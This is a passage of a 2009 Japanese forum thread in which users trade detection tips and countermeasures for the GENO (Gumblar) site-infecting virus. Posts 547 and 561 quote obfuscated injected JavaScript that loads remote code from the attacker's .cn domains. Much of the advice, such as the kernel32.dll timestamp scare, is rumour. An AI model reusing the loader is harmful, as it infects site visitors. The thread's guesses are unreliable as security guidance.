タイムスタンプは「現状(09/05/17 0時現在)」とかにした方がいい。
結構な早さで感染・亜種発生してる印象を受けるし、
それ以前に分かってないことも多いから
いつ時点の情報なのか明確にしておいた方が安心感が出る。
更新乙
携帯の件に限らずなんだけど、
タイムスタンプは「現状(09/05/17 0時現在)」とかにした方がいい。
結構な早さで感染・亜種発生してる印象を受けるし、
それ以前に分かってないことも多いから
いつ時点の情報なのか明確にしておいた方が安心感が出る。
kernel32.dllが2009年3月21日、23:07:24
この予感・・・セーフ!
この予感・・・セーフ!
×WindowsUpdate
○PDFリーダーを最新にする (AdobeReader や Foxit Reader)
×AdobeFlashを最新にする
×94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
○Adobe ReaderとブラウザのJavascriptを切る
○貼られている怪しいリンクをむやみに開かない
○ウイルス定義ファイルを更新する
とりあえずわかる所だけ実行しました
×の部分はよくわからなくて放置です
○の部分だけでも感染はある程度ふせげますか?
○PDFリーダーを最新にする (AdobeReader や Foxit Reader)
×AdobeFlashを最新にする
×94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
○Adobe ReaderとブラウザのJavascriptを切る
○貼られている怪しいリンクをむやみに開かない
○ウイルス定義ファイルを更新する
とりあえずわかる所だけ実行しました
×の部分はよくわからなくて放置です
○の部分だけでも感染はある程度ふせげますか?
429 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:10:59 ID:GY3wvD8F0
>401
自分も。なんも出てこなかったし、サイトも平気だし今のところ何もないけど、
今月入って少し重たくなったのが恐い。気をつけてよう…
自分も。なんも出てこなかったし、サイトも平気だし今のところ何もないけど、
今月入って少し重たくなったのが恐い。気をつけてよう…
サイト持ってない手ブロユーザーだけど自ジャンルタグで注意喚起したけど効果あるかな
433 :geno:2009/05/17(日) 01:11:44 ID:Lgdg/CN90
>kernel32.dllが2009年3月21日
どういう流れでそのファイルが日付更新されてたらアウトってことになったんだ
どういう流れでそのファイルが日付更新されてたらアウトってことになったんだ
自分もkernel32.dllの更新が2009年3月21日、23:07:24になってる
アウアウ判定はまだ早いんじゃね
アウアウ判定はまだ早いんじゃね
436 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:12:00 ID:2vZwPaWL0
kernel32.dllが?2009?年?2?月?13?日、??17:49:05
これマズいんかな
これマズいんかな
君ら疑心暗鬼になりすぎ
釣りに引っ掛かるぞ
釣りに引っ掛かるぞ
ん?なんで日付だけでアウセフ言ってんの?
自分スレ全部見てる暇人だけど
サイズが普通だったらセフ、大きければアウトでFA出てんじゃないの?
自分スレ全部見てる暇人だけど
サイズが普通だったらセフ、大きければアウトでFA出てんじゃないの?
すみません質問なんですが、WindowsXP使っており、まとめサイトの感染確認(感染してなかったです)と
感染前の対策を実践したあと、ネットに接続はできるけどIEでどこのページも表示されない上に、
OEでメールの送受信もできなくなりました
ちなみに他のブラウザやメールソフトは入っていません。
何か考えられる原因はありますか?
感染前の対策を実践したあと、ネットに接続はできるけどIEでどこのページも表示されない上に、
OEでメールの送受信もできなくなりました
ちなみに他のブラウザやメールソフトは入っていません。
何か考えられる原因はありますか?
442 :GENO:2009/05/17(日) 01:13:14 ID:sYclzj/p0
>>427
全く同じなんだけど、セーフ…?
全く同じなんだけど、セーフ…?
夕方のgoogle急上昇ワードに
GENOウィルスが6位にはいってたんだが
なくなったな…
ところで、色んな設定方法とか書かれたり転載されてるけど、
ほんとうにこれって正しいっていえるのかな?
それっぽい書き方されると、鵜呑みにしてしまうけども
危険かなーとも思う
もちろん、教えてもらえるのは嬉しいんだけど
GENOウィルスが6位にはいってたんだが
なくなったな…
ところで、色んな設定方法とか書かれたり転載されてるけど、
ほんとうにこれって正しいっていえるのかな?
それっぽい書き方されると、鵜呑みにしてしまうけども
危険かなーとも思う
もちろん、教えてもらえるのは嬉しいんだけど
>>439
どう考えてもFWの設定をミスっています本当にあ(ry
どう考えてもFWの設定をミスっています本当にあ(ry
>>327>>405あたりのMacの話だが
「とりあえず感染してるか確認する手順(Mac)」もしくは
「Macユーザー向け」でページを作りたい
マカーさん、そのままコピペすればおk的なテンプレたのむ
>>383ちょい考えるわ
(383まで確認)
「とりあえず感染してるか確認する手順(Mac)」もしくは
「Macユーザー向け」でページを作りたい
マカーさん、そのままコピペすればおk的なテンプレたのむ
>>383ちょい考えるわ
(383まで確認)
kernel32は普通のwindowsupdateのような気がしてきた
セフなのかアウのかどっちなんだw
Yahoo!メール使ってる人はPOP3受信サービスをつかってみたら?
受信サーバの名前 pop.mai.yahoo.co.jp
ユーザー名 メールアドレス@の左側、つまりユーザーアカウント
受信サーバのポート番号 110
APOPを使用 しない
SSLを使用 しない
受信したメールをサーバから削除 しない
送信設定は
smtp.mai.yahoo.co.jp
POP before SMTP する
SMTP認証 しない
パスワード 自分で定義したパス
受信サーバの名前 pop.mai.yahoo.co.jp
ユーザー名 メールアドレス@の左側、つまりユーザーアカウント
受信サーバのポート番号 110
APOPを使用 しない
SSLを使用 しない
受信したメールをサーバから削除 しない
送信設定は
smtp.mai.yahoo.co.jp
POP before SMTP する
SMTP認証 しない
パスワード 自分で定義したパス
449 :GENO:2009/05/17(日) 01:14:35 ID:J2f6QJAe0
421の釣りかよ
勘弁しろ
勘弁しろ
450 :GENO:2009/05/17(日) 01:14:50 ID:Eqx9T9080
ちょ、kernel32.dllについてkwsk
更新が同じく3/21なんだが…
更新が同じく3/21なんだが…
452 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:15:12 ID:Jm4nXT7A0
弾くIPアドレスリストがまとめサイトとかここに掲載されてるけど
元情報はどこからなの?
元情報はどこからなの?
ファイルの正しい、正しくないはタイムスタンプだけ見てても無意味。
MD5をチェックして、それで判断をすべき。
MD5をチェックしたら、複数人でつき合わせて判断するといい。
時間だけ気にしてても、何の解決にもならないよ。
kernel32.dllで不安になってる人は、MD5をチェックするんだ。
チェックするソフトがない人は、これとかどうかな。
ElleFileInfo
ttp://www.elletime.net/freeware.html
MD5をチェックして、それで判断をすべき。
MD5をチェックしたら、複数人でつき合わせて判断するといい。
時間だけ気にしてても、何の解決にもならないよ。
kernel32.dllで不安になってる人は、MD5をチェックするんだ。
チェックするソフトがない人は、これとかどうかな。
ElleFileInfo
ttp://www.elletime.net/freeware.html
454 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:16:27 ID:bMv9yql40
455 :geno:2009/05/17(日) 01:16:42 ID:ZlOuERst0
感染時の対策方法を具体的に
おしえて
おしえて
kernel32.dll2009年3月21日、23:07:24
まったく同じです
まったく同じです
クリーンインスコ
>>418が気になってkernel32.dll調べたら更新日時が2009年3月21日23:18:57で同じだった
sqlsodbc.chm、cmd.exe、regedit.exeは正常
ニフティスキャンも異常なしだけど感染?亜種ってことでいいのかな
sqlsodbc.chm、cmd.exe、regedit.exeは正常
ニフティスキャンも異常なしだけど感染?亜種ってことでいいのかな
感染してるかどうか分からなかったら、
>>13に挙げたサイト使って調べてみるのもあり。
たとえばkernel32.dllが疑わしいと感じた場合なら、
これをサイトでスキャンかけられる。
http://www.virustotal.com/jp/
Virustotal は 疑わしいファイルを解析するサービスであり、
ウイルス、ワーム、トロイの木馬およびアンチウイルスエンジンにより
検出される全てのマルウェアを素早く簡単に検出します。
>>13に挙げたサイト使って調べてみるのもあり。
たとえばkernel32.dllが疑わしいと感じた場合なら、
これをサイトでスキャンかけられる。
http://www.virustotal.com/jp/
Virustotal は 疑わしいファイルを解析するサービスであり、
ウイルス、ワーム、トロイの木馬およびアンチウイルスエンジンにより
検出される全てのマルウェアを素早く簡単に検出します。
>>390
確実に感染してるのならリカバリすればいいがね。。。
つうかノートンなら今アップデート来てるんじゃないの?
今回のウイルスに対応したものかはわからんけどな。
http://pc11.2ch.net/test/read.cgi/sec/1242489450/1,10,14,17
対策はセキュ板のテンプレ見て自分で判断するように。
今のとこは窓やノートンのアップデートは最低限として
あとはフラッシュやアドビリーダーのアップデートやっとけばおkなはず。
確実に感染してるのならリカバリすればいいがね。。。
つうかノートンなら今アップデート来てるんじゃないの?
今回のウイルスに対応したものかはわからんけどな。
http://pc11.2ch.net/test/read.cgi/sec/1242489450/1,10,14,17
対策はセキュ板のテンプレ見て自分で判断するように。
今のとこは窓やノートンのアップデートは最低限として
あとはフラッシュやアドビリーダーのアップデートやっとけばおkなはず。
462 :GENO:2009/05/17(日) 01:18:47 ID:lOQh6FbQ0
感染した人はブルースクリーンで起動した?
これは絶対に起こることでもないのか
これは絶対に起こることでもないのか
ノートンで特に反応しないのにカスペで真っ赤になる件
確認しなおしたら
Application Data\Symantec\Norton AntiVirus\
ノートンかよ…まったくおまえときたら…
確認しなおしたら
Application Data\Symantec\Norton AntiVirus\
ノートンかよ…まったくおまえときたら…
465 :GENO:2009/05/17(日) 01:19:51 ID:kP1tdjseO
サイトの目立つところに警告文載せたがみんな見てくれてんだろうか・・・
幸と大手サイトが動いてくれればなあ
軒並みウィルスには触れずに普通に更新してっから心配だわ
ちなみにパソからじゃ怖いので携帯で巡回してる
幸と大手サイトが動いてくれればなあ
軒並みウィルスには触れずに普通に更新してっから心配だわ
ちなみにパソからじゃ怖いので携帯で巡回してる
466 :GENO:2009/05/17(日) 01:20:02 ID:WVTbay1AO
421は釣りか日にちで判断した勘違いかと思われる
自パソが感染してたんだけど、自サイトは感染してなかった
この場合、下手に削除するより、そのままサイト放置でいいのかな?
ちょっと時間取れなくて、クリーンインストールは週明けになりそうなんだ
この場合、下手に削除するより、そのままサイト放置でいいのかな?
ちょっと時間取れなくて、クリーンインストールは週明けになりそうなんだ
質問させてください。
マイパソコン(FTPアップロード元)が感染していなければ
マイサイトも感染しないという認識で合っていますか?
サイトトップのソース見てみたら、何のためにあるのかよく分からない
長いJAVAスクリプトがあるので怖くなってきました。
パソコン自体はmacなので、まだ感染してないと思うんですが。
マイパソコン(FTPアップロード元)が感染していなければ
マイサイトも感染しないという認識で合っていますか?
サイトトップのソース見てみたら、何のためにあるのかよく分からない
長いJAVAスクリプトがあるので怖くなってきました。
パソコン自体はmacなので、まだ感染してないと思うんですが。
>>394
>>433
カスペでウイルス判定されたikxof.qfgファイルと書き換えられたsqlsodbc.chmは
3/21の23:07:24でkernel32.dllも全く同じ日時だった
因みにOSをインストールしたのはそれより後の4/14なんだよね・・・
Windowsのシステム関連で3/21の23:07:24のファイルはこの3つだけだった
http://2sen.dip.jp/cgi-bin/upgun/up10/source/up1441.jpg
>>433
カスペでウイルス判定されたikxof.qfgファイルと書き換えられたsqlsodbc.chmは
3/21の23:07:24でkernel32.dllも全く同じ日時だった
因みにOSをインストールしたのはそれより後の4/14なんだよね・・・
Windowsのシステム関連で3/21の23:07:24のファイルはこの3つだけだった
http://2sen.dip.jp/cgi-bin/upgun/up10/source/up1441.jpg
470 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:20:45 ID:8/IcS20M0
kernel32.dllはガセ情報。
さすがにそれに感染したら大騒ぎになる。
さすがにそれに感染したら大騒ぎになる。
471 :geno:2009/05/17(日) 01:21:29 ID:Lgdg/CN90
>>467
おk
おk
474 :geno:2009/05/17(日) 01:21:52 ID:s+rgNGWb0
kernel32.dllはupdateじゃないか
ほぼ同時刻に更新されてるファイルを調べたらwindows updateだったよ
ほぼ同時刻に更新されてるファイルを調べたらwindows updateだったよ
すまん最初にkernel32.dllの話だしてしまって
kernel32.dllが今日入れたavastウィルスのチェストに隔離されて
詳細は「ウィルスなし」って出るんだけど更新日が3/21だったから気になっただけなんだ
最初に出ていたsqlsodbc.chmが改ざんされた場合が3/21だったから。
updateならいいな
kernel32.dllが今日入れたavastウィルスのチェストに隔離されて
詳細は「ウィルスなし」って出るんだけど更新日が3/21だったから気になっただけなんだ
最初に出ていたsqlsodbc.chmが改ざんされた場合が3/21だったから。
updateならいいな
>>439
そういや自分が使っているメル鯖(さくら)も昨夜突然送受信不能になったけど
ポート番号変えたら治ったよ。ウイルスとは無関係と思って気にも留めて無かったけど…
ポート番号変更についてはさくらのQ&Aに載ってたので
439も一度メール設定確認してみたらどうだろう
そういや自分が使っているメル鯖(さくら)も昨夜突然送受信不能になったけど
ポート番号変えたら治ったよ。ウイルスとは無関係と思って気にも留めて無かったけど…
ポート番号変更についてはさくらのQ&Aに載ってたので
439も一度メール設定確認してみたらどうだろう
480 :GENO:2009/05/17(日) 01:22:35 ID:5igu3G/B0
>>464
わらってしまた・・・
わらってしまた・・・
どっちにしろkernel32.dllはあまり当てにならない気がする
タイムスタンプはいくらでも改ざん可能だし
Windows Updateで更新されることも多いから、MD5ハッシュ値もバラバラだし
タイムスタンプはいくらでも改ざん可能だし
Windows Updateで更新されることも多いから、MD5ハッシュ値もバラバラだし
kernel32.dllが3/21ktkr\(^o^)/
取り合えずcgi制御の携帯サイトだしネットショッピングしてないからセフセフ
明日は大々的にクリーンインスコせにゃ…
しかしkernel32.dllもWikiの検査項目に追加しといた方がいいんじゃね?
もう結構な数報告見かけてる気がする
そして誰かkernel32.dllの正しいファイルサイズとハッシュ値をお願いします
そっちも確認してみたい
取り合えずcgi制御の携帯サイトだしネットショッピングしてないからセフセフ
明日は大々的にクリーンインスコせにゃ…
しかしkernel32.dllもWikiの検査項目に追加しといた方がいいんじゃね?
もう結構な数報告見かけてる気がする
そして誰かkernel32.dllの正しいファイルサイズとハッシュ値をお願いします
そっちも確認してみたい
>>468
MACも油断できない状況。詳しくは>>327
テンプレを借りて作ったサイトかな。
JavaScriptのソースはどこかにUPできる?
あるいは、ここと同じor非常に酷似したソースなら疑って、
ウィルスチェックした方がいい。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325728558
もちろん、今できる対策はきちんとするのがおすすめ。
MACも油断できない状況。詳しくは>>327
テンプレを借りて作ったサイトかな。
JavaScriptのソースはどこかにUPできる?
あるいは、ここと同じor非常に酷似したソースなら疑って、
ウィルスチェックした方がいい。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325728558
もちろん、今できる対策はきちんとするのがおすすめ。
>>464
先生変なところで出たがりだから…
先生変なところで出たがりだから…
>>482
タイムスタンプとMD5とセットでやっと意味を成す
タイムスタンプとMD5とセットでやっと意味を成す
改竄されたsqlsodbc.chmがkernel32.dllのタイムスタンプにあわせるんだったりして
488 :GENO:2009/05/17(日) 01:25:44 ID:OukNUfSz0
自分もkernel32.dllが2009/03/21 23:07だったよ
一応MD5とかチェックしたけど正しい数値が分からん
CRC32
44cff192
MD5
96c3b8ea807334f4756106901c6f9495
SHA-1
60edcc193e8d9973d70778c4d03e41c98dbf8b15
一応MD5とかチェックしたけど正しい数値が分からん
CRC32
44cff192
MD5
96c3b8ea807334f4756106901c6f9495
SHA-1
60edcc193e8d9973d70778c4d03e41c98dbf8b15
一応、kernel32.dllが2009年3月21日23時
ってかかれてても問題ないって事でOKですか?
ってかかれてても問題ないって事でOKですか?
490 :GENO:2009/05/17(日) 01:26:01 ID:lOQh6FbQ0
kernel32.dllがおかしいって言う人は他の症状はどうなのかも併記してほしいな
>>468
チェッカーぶちこんでみたら?
チェッカーぶちこんでみたら?
>>469
ちょっとそれを持ち出してくるのは尚早
ちょっとそれを持ち出してくるのは尚早
自分もkernel32.dllは3月21日だけどこれって本当にやばいの?
感染しててもしてなくてもみんなそうなんじゃないの?
ちなみにsqlsodbc.chmの方は異常なしだぞ
感染しててもしてなくてもみんなそうなんじゃないの?
ちなみにsqlsodbc.chmの方は異常なしだぞ
Kernel32のサイズ1,235,968 バイトだった
sqlsodbc.chmが46,133バイトしかないんだけど
アウト?
アウト?
うちのvistaは二台とも3月21日じゃなかった。
3月21日になってる人はもしかして皆XPだったりして?
3月21日になってる人はもしかして皆XPだったりして?
あれ、じゃあ私のとこもセーフなのか?
それならそれでいいんだが… ウイルスの方のあれがkernelにあわせてあんのかな
どっちにしろそれが普通ならよかった、ほっとした
それならそれでいいんだが… ウイルスの方のあれがkernelにあわせてあんのかな
どっちにしろそれが普通ならよかった、ほっとした
498 :GENO:2009/05/17(日) 01:27:23 ID:Gl7V2Hy60
みんな書き込む前にリロードしようぜ
ありがとう
念のため削除するか迷ったけど、しばらく放置でいく
念のため削除するか迷ったけど、しばらく放置でいく
全く感染の症状も無く、チェック項目は全てALLグリーン
99%感染していないと断言できる自分のPCもkernel32.dllは
2009/03/21 23:07 だったからこれは気にしなくて良いと思う
99%感染していないと断言できる自分のPCもkernel32.dllは
2009/03/21 23:07 だったからこれは気にしなくて良いと思う
503 :GENO:2009/05/17(日) 01:28:40 ID:GhtL9Szf0
504 :GENO:2009/05/17(日) 01:28:41 ID:Co0JIJet0
kernel32.dllとやらって一体。
うちは2005年とか出てましたが。なにこれ。
うちは2005年とか出てましたが。なにこれ。
俺も488と同じMD5、タイムスタンプだったよ
>>499
vista同じく4月。
vista同じく4月。
>>445
>「とりあえず感染してるか確認する手順(Mac)」もしくは
>「Macユーザー向け」
叩き台作ってみようと思うんだが
>>468みたいなのがいるとなると、
不可視ファイルの可視化から書かないとダメってことか?
>「とりあえず感染してるか確認する手順(Mac)」もしくは
>「Macユーザー向け」
叩き台作ってみようと思うんだが
>>468みたいなのがいるとなると、
不可視ファイルの可視化から書かないとダメってことか?
うちもKernel32が3/21です。その他はまったく異常なし。
>>507
OKちょっと安心したw
OKちょっと安心したw
>>488
同じかつVirustotalでチェックして問題なし
同じかつVirustotalでチェックして問題なし
>>506
了解です、ありがとう
了解です、ありがとう
お前ら落ち着いてしばらくリロしてろ
話題被りすぎ
話題被りすぎ
514 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:30:18 ID:qPi+TdMh0
regedit開くと必ずHKEY_USERSが展開されてるんだが・・・
とりあえず寝ようぜ
同じく全ての項目はクリアしてる自分のPCのKernel32.dllも2009年3月21日23:18:57
Kernel32.dllは関係ないと見ていいと思う
Kernel32.dllは関係ないと見ていいと思う
とりあえず今の流れで馬鹿が多いことはよく分かったな
518 :geno:2009/05/17(日) 01:30:55 ID:/3OwKYN30
>>448
ずっと前から試してるんだがメールソフトだと
送信だけがなぜかできないからブラウザにしてるんだよね
狐にNoscript入れてヤフメに許可出すことにしたよ
このページはおk…と許可出す隙もなく1秒でヤフメが警告ページに飛ばしやがるから
許可指定するのにちょと苦労したw
ずっと前から試してるんだがメールソフトだと
送信だけがなぜかできないからブラウザにしてるんだよね
狐にNoscript入れてヤフメに許可出すことにしたよ
このページはおk…と許可出す隙もなく1秒でヤフメが警告ページに飛ばしやがるから
許可指定するのにちょと苦労したw
kernel32.dllがウイルスに弄られるって相当致命的なんじゃないか?
そんなことあったら一月前にはブラスター程度の騒ぎにはなってそうだがな。
そんなことあったら一月前にはブラスター程度の騒ぎにはなってそうだがな。
お前等落ち着け
不安ならハッシュチェックソフト入れろ
ハッシュチェックでググッてな
不安ならハッシュチェックソフト入れろ
ハッシュチェックでググッてな
女は馬鹿でFAだな
過去スレも読めと
過去スレも読めと
523 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:31:17 ID:Gp+4lfdx0
kernel32.dllは違うぞ
524 :GENO:2009/05/17(日) 01:31:29 ID:OukNUfSz0
>>488
自分も一緒だった
MD5 : 96c3b8ea807334f4756106901c6f9495
SHA-1 : 60edcc193e8d9973d70778c4d03e41c98dbf8b15
自分も一緒だった
MD5 : 96c3b8ea807334f4756106901c6f9495
SHA-1 : 60edcc193e8d9973d70778c4d03e41c98dbf8b15
HDDゴリゴリ言ってるなノートン更新の時間かw
527 :GENO:2009/05/17(日) 01:32:04 ID:xeHWSKXvO
VISTA使い
・AdobeのReaderとFlashを最新版に
・Windowsアップデート
・IE8インストール
・ファイヤーウォールで禁止IP設定
・JAVAScript切り(Adobeのも
これだけやっておけばOK?
セキュリティソフトはマカフィーとかいうのが入ってて、それを最新版に更新したけど
これってどうなの
・AdobeのReaderとFlashを最新版に
・Windowsアップデート
・IE8インストール
・ファイヤーウォールで禁止IP設定
・JAVAScript切り(Adobeのも
これだけやっておけばOK?
セキュリティソフトはマカフィーとかいうのが入ってて、それを最新版に更新したけど
これってどうなの
528 :geno:2009/05/17(日) 01:32:08 ID:ZlOuERst0
感染を確認した(cmdが実行できなかった、ファイルの書き換えを確認した)
システム復元で1ヶ月前に戻した
そしたらcmdとか普通に動いたがそれで良い??
システム復元で1ヶ月前に戻した
そしたらcmdとか普通に動いたがそれで良い??
自分も2009年3月21日、23:18:57
チェックは全部白
チェックは全部白
>>427と更新時刻まで一緒なんだけどまさかこれって…
>>514
regeditは前閉じた時の階層と同じ場所開のがデフォ
regeditは前閉じた時の階層と同じ場所開のがデフォ
kerner32は今のところ関係ないと思う
kernelの話いつまでしてるんだ君らはw
534 :GENO:2009/05/17(日) 01:33:53 ID:/BtRfzOz0
JavaScriptと言われて意味がわからない人、過剰に不安がらないように。
人のサイトのソースを見て、ただのポップアップウィンドウとか
普通に使うタグをウイルスと勘違いして米を送ってくる人がいるらしいが
>>468
数行から十数行程度の、単語などが判読できるようなものなら
サーバで挿入された広告やアク解だよ
ウイルスのコードはもっととんでもない量がある、素人には全く意味不明の記号の羅列。
>>484
>>327にあるMac用の対策は、これだけやってあればまず大丈夫だろというもので
感染者が出たからではないよ
人のサイトのソースを見て、ただのポップアップウィンドウとか
普通に使うタグをウイルスと勘違いして米を送ってくる人がいるらしいが
>>468
数行から十数行程度の、単語などが判読できるようなものなら
サーバで挿入された広告やアク解だよ
ウイルスのコードはもっととんでもない量がある、素人には全く意味不明の記号の羅列。
>>484
>>327にあるMac用の対策は、これだけやってあればまず大丈夫だろというもので
感染者が出たからではないよ
お前らのせいでケンタッキー食いたくなってきたぞ
どうしてくれる
どうしてくれる
536 :GENO:2009/05/17(日) 01:34:22 ID:QyWL1QXS0
感染なかったら寝ろよお前ら
538 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:34:59 ID:RBgr+byX0
こいつら過去レスも読めんのか・・・
kerner32がそんなに怖いなら削除すればいいだろ
540 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:35:05 ID:8/IcS20M0
>>528
クリーンインストールマジお勧め。
クリーンインストールマジお勧め。
>535
カーネルか
カーネルか
サイトに>>3のまとめへのリンク貼るのは問題ない?
VistaとデュアルブートさせてるUbuntuで踏むとまずいのかね
>>541
それだとサンダース人形の呪いになっちまう
それだとサンダース人形の呪いになっちまう
547 :GENO:2009/05/17(日) 01:35:56 ID:KGeijqa+0
感染してた場合のソース状況
937 :GENO:2009/05/16(土) 18:44:59 ID:O4mBjhCo0
挿入スクリプト参考に追加
※ランダムに文字を削除したから貼り付けても動かないよ
<すくりぷと language=じゃばすくりぷと><!--
(function(){var UkRR='%';var WdBp=('&61&20a&3d&22S&69ptEngi&65&22&2c&3d&22&56&
65&72s&69on+()&22&2c&6a&3d&22&22&2c&3dn&61&76ig&61tor2user&41&67ent&3bi&66
(u&2ein&6&65x&4f&66(&22C&68rm&65&22)&3c0)&26&26(&75&2ein&64ex&4ff(&22i&6e&22)
&3e0)&26&26&28u&2e&69&6d&65x&4ff&28&22&4e&54&206&22)&3c0)&26&26(&64cument
&2ecooki&65&2e&6ede&78O&66(&22&6di&6b&3d&31&22)&3c0)&26&26(t&79peo&66&28&
7arvzts)&21&3dty&70&65of&28&22A&2&7brvzt&73&3d&22A&22&3bval(&22i&66
(win&64o&77&2e&22+a+&22)))&3dj+&22+&6+&22M&61j&6fr&22+b&2b&2b&22Mi&6e&6fr
&22+a+b+&22&42uild&22+b+&22j&3&22&29&3b&646f&63ument&2ewr&69te&28&22&3cs
&63ri&70t&0&73&72c&3d&2f&2fma&72t&75&22+&22z&2e&63n&f&76i&64&2f&3fid&3d&22
&2bj+22&3c&5c&2fscrip&74&3e&22)&3b&7d').rplace(/&/g,URR);eval(uescape(WdBp))})();
--></すくりぷと>
937 :GENO:2009/05/16(土) 18:44:59 ID:O4mBjhCo0
挿入スクリプト参考に追加
※ランダムに文字を削除したから貼り付けても動かないよ
<すくりぷと language=じゃばすくりぷと><!--
(function(){var UkRR='%';var WdBp=('&61&20a&3d&22S&69ptEngi&65&22&2c&3d&22&56&
65&72s&69on+()&22&2c&6a&3d&22&22&2c&3dn&61&76ig&61tor2user&41&67ent&3bi&66
(u&2ein&6&65x&4f&66(&22C&68rm&65&22)&3c0)&26&26(&75&2ein&64ex&4ff(&22i&6e&22)
&3e0)&26&26&28u&2e&69&6d&65x&4ff&28&22&4e&54&206&22)&3c0)&26&26(&64cument
&2ecooki&65&2e&6ede&78O&66(&22&6di&6b&3d&31&22)&3c0)&26&26(t&79peo&66&28&
7arvzts)&21&3dty&70&65of&28&22A&2&7brvzt&73&3d&22A&22&3bval(&22i&66
(win&64o&77&2e&22+a+&22)))&3dj+&22+&6+&22M&61j&6fr&22+b&2b&2b&22Mi&6e&6fr
&22+a+b+&22&42uild&22+b+&22j&3&22&29&3b&646f&63ument&2ewr&69te&28&22&3cs
&63ri&70t&0&73&72c&3d&2f&2fma&72t&75&22+&22z&2e&63n&f&76i&64&2f&3fid&3d&22
&2bj+22&3c&5c&2fscrip&74&3e&22)&3b&7d').rplace(/&/g,URR);eval(uescape(WdBp))})();
--></すくりぷと>
誰か教えてくれると嬉しいんだが、マカフィーってどうなの?
今入れてるんだが特に反応はしていない
で、まとめに書いてある通り調べたら感染はしてないみたい
今入れてるんだが特に反応はしていない
で、まとめに書いてある通り調べたら感染はしてないみたい
マカフィーなんて今すぐ窓から投げ捨てろ
551 :GENO:2009/05/17(日) 01:37:22 ID:eKRh6hw+0
>477がちょっと気になったってだけでkernel32.dllを出したんだろ?
ソースも何も無いのに何踊ってんだ…とりあえず回線切って寝ようぜ
ソースも何も無いのに何踊ってんだ…とりあえず回線切って寝ようぜ
>>528
駄目
駄目
それじゃあうちのkernel32.dll 2009年3月21日、23:07:24
MD5
96C3B8EA807334F4756106901C6F9495
MD5
96C3B8EA807334F4756106901C6F9495
>>539
それWindows捨てろといってるようなもんじゃないかw
それWindows捨てろといってるようなもんじゃないかw
555 :GENO:2009/05/17(日) 01:37:48 ID:Qk4iTuLX0
サイトのソースに長文のjavascriptを書いてる人は、
今の時期だけでも外部ファイル化しとくと誤解防げていいかもね
今の時期だけでも外部ファイル化しとくと誤解防げていいかもね
一つの話題に「あたしにも一言言わせて」と同じようなレスをつける現象と似てるな
>>527
ユーザーアカウント制御有効(デフォルトのまま)
ユーザーアカウント制御有効(デフォルトのまま)
FlashPlayerとかReaderとかを火狐で入れようとした場合
アドオン扱いされるようにやらなきゃいけないのかな?
特にReaderは何か普通にデスクトップにアイコン作られてしまった
アドオン扱いされるようにやらなきゃいけないのかな?
特にReaderは何か普通にデスクトップにアイコン作られてしまった
>>542
そんなことも分からないならもうサイト管理なんてするな
そんなことも分からないならもうサイト管理なんてするな
561 :GENO:2009/05/17(日) 01:38:47 ID:/BtRfzOz0
スレ2の920 名前:GENO メェル:sage 投稿日:2009/05/16(土) 18:39:12 ID:5AlQPwu90
セキュリティ板のGENOスレ4にあったJavaScriptの一例貼るよ
スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト
セキュリティ板のGENOスレ4にあったJavaScriptの一例貼るよ
スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
